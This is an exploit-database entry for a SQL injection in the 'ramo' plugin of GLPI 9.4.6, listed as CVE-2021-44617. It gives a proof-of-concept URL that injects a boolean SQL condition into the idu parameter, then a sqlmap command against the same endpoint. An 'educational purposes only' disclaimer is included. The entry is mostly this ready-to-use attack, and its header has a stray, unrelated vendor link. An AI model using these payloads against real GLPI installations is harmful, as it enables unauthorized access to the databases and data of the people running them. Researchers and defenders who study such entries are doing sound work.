Baixar glpi project 9.4.6 sqli Vulnerability / Exploit

  /     /     /  

Exploits / Vulnerability Discovered : 2022-03-14 | Type : webapps | Platform : multiple
This exploit / vulnerability Baixar glpi project 9.4.6 sqli is for educational purposes only and if it is used you will do on your own risk!


[+] Code ...

# Exploit Title: Baixar GLPI Project 9.4.6 - SQLi
# Date: 10/12
# Exploit Author: Joas Antonio
# Vendor Homepage: https://glpi-project.org/pt-br/ <https://www.blueonyx.it/
# Software Link: https://glpi-project.org/pt-br/baixar/
# Version: GLPI - 9.4.6
# Tested on: Windows/Linux
# CVE : CVE-2021-44617

#POC1:
plugins/ramo/ramoapirest.php/getOutdated?idu=-1%20OR%203*2*1=6%20AND%20000111=000111

sqlmap -u "url/plugins/ramo/ramoapirest.php/getOutdated?idu=-1"